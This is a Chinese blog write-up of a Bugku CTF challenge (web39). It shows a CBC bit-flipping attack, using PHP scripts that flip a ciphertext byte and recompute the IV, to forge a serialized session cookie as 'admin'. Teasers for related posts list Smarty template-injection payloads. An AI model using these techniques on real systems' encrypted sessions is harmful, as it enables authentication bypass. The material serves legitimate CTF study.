首页 > 其他分享 >Bugku-web39(CBC反转攻击)

Bugku-web39(CBC反转攻击)

时间:2023-08-30 09:13:49浏览次数:43  
标签:CBC Bugku 传入 vi 3D% web39 序列化 3D

images

传入cipher::
o0Na0VUpA9NNqK5lQTP3chZqec57H%2FAMEkq5YSNE3oDfyc1WXAyLMW8RbiwIX9dyKMF5uwWSEzJVCKxOsDnVcQ%3D%3D
传入的vi::
L4p%2BUXpwki%2FiUktyYxs7eg%3D%3D

<?php
header("Content-Type: text/html;charset=utf-8");
    #计算cipher
    /*
    明文1:a:2:{s:8:"userna        //r
    明文2:me";s:5:"admil";        //l字母在第14个字节
    明文3:s:8:"password";s
    明文4::3:"123";}
    */
    $cipher = base64_decode(urldecode('o0Na0VUpA9NNqK5lQTP3chZqec57H%2FAMEkq5YSNE3oDfyc1WXAyLMW8RbiwIX9dyKMF5uwWSEzJVCKxOsDnVcQ%3D%3D'));
    $temp = $cipher;
    /*
    设密文1[13]=A, 解密(密文2)[13]=B,  明文2[13]=C,  
    将A修改为A ^ C,则:
    A ^ B = A ^ C ^ B = B ^ B = 0 = C
    */
    //                      A                 C          X
    $cipher[13] = chr(ord($cipher[13]) ^ ord('m') ^ ord('n'));
    echo urlencode(base64_encode($cipher));
    ?>

解的::

o0Na0VUpA9NNqK5lQTD3chZqec57H%2FAMEkq5YSNE3oDfyc1WXAyLMW8RbiwIX9dyKMF5uwWSEzJVCKxOsDnVcQ%3D%3D

传入后报错:

base64_decode('ZGnkgxEqgxOjbjD65j6oCG1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjA6IiI7fQ==') can't unserialize

在处理vi::

<?php
    #计算iv
    $res = base64_decode('ZGnkgxEqgxOjbjD65j6oCG1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjA6IiI7fQ==');   //这里放burp放回的base64数据
    $iv = base64_decode(urldecode('L4p%2BUXpwki%2FiUktyYxs7eg%3D%3D')); //这里放cookie中的iv
    $plaintext = 'a:2:{s:8:"userna';
    $new_iv = '';
    for ($i = 0; $i < 16; $i ++){
        $new_iv = $new_iv . chr(ord($iv[$i]) ^ ord($res[$i]) ^ ord($plaintext[$i]));
    }
    echo urlencode(base64_encode($new_iv));
?>

截取cipher进行异或操作;;因为序列化后可以看到传入的用户名的位置;;进行异或操作之后修改用户名为admin;;之后在提交;通过返回的数据包解密得到序列化后的文件,通过序列化后的文件在对vi进行重新编译;;

images

标签:CBC,Bugku,传入,vi,3D%,web39,序列化,3D
From: https://www.cnblogs.com/KAKSKY/p/17666335.html

相关文章

  • Bugku-web40
    这题考察的是git信息泄露,挺好的题目;;我都不懂git信息泄露是什么鬼用dirsearch扫描后有.git目录,电脑浏览器访问发现不了什么,看了大哥的博客,用kali里面的git命令,现在学习一下这些命令::wget递归下载::gitreflog::查看执行的命令日志gitresetcommit_id::回退到该版本的版本库gitshow......
  • Bugku-web41
    该题目涉及到了序列化;Base64解码;cgi;ssrf;php中的file协议;代码审计,我只知道涉及到了序列化,还有我提交的方法是POST的,其他的我都不是很懂了,所以看了别人的wp;;https://blog.csdn.net/qq_53460654/article/details/116329685<?php// php版本:5.4.44header("Content-type: text/h......
  • Bugku-web安慰奖(序列化)
    php序列化的一个题目;;参考博客:https://blog.csdn.net/weixin_44190459/article/details/116648636目前还没有搞明白怎么一回事:<?phpclassctf{protected$username='admin';protected$cmd='tacflag.php';}$ctf=newctf();echoserialize($ctf);;?>......
  • Bugku-xxx二手交易市场
    注入点在上传图片处,图片上传后会被base64编码,就从这里入手,上传一句话木马;image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgZXZhbCgkX1BPU1RbJ2ZsYWcnXSk7Pz4=......
  • Bugku-聪明的php
    smarty模板注入常用的payload常用payload常用payload{ifphpinfo()}{/if}{ifsystem('ls')}{/if}{ifreadfile('/flag')}{/if}{ifshow_source('/flag')}{/if}{ifsystem('cat../../../flag')}{/if}smarty中的{if}标签中可以执行php语句随便传参可......
  • Bugku-misc-telnet
    刚结束的ciscn,里面的要是有这么简单就好了。下载附件,是个pcap文件,打开wireshark分析一节一节看过去就找到了flag没难度的~~~......
  • Bugku-Web13
    根据题意进行unescape解码,得到js脚本,将js脚本中的代码填入输入框中点击提交就得到了flag......
  • Bugku-Web12
    没啥思路,感觉自己在刷题,,,这个考虑的是本地管理员查看源码可以知道密码是base64加密的,使用工具解码就可以了!账号是admin,从评论里知道的...打开burp抓包,修改X-Forwarded-For:127.0.0.1即可......
  • Bugku-Web11
    没啥思路,在这个网站上不能右键弹出属性框,F12查看也没啥可看的,所以就去看了看评论,大概的套路有了,就只有实践了先安装dirsearch:https://github.com/maurosoria/dirsearch进入GitHub下载zip包,我拖到了kali里面安装,因为在wndows中解压输入命令就弹出dirsearch.py的文本文件,做完......
  • Bugku-Web10
    这个很简单!!!看了查看器,里面啥也没有,就看看网络,点开发现了flag......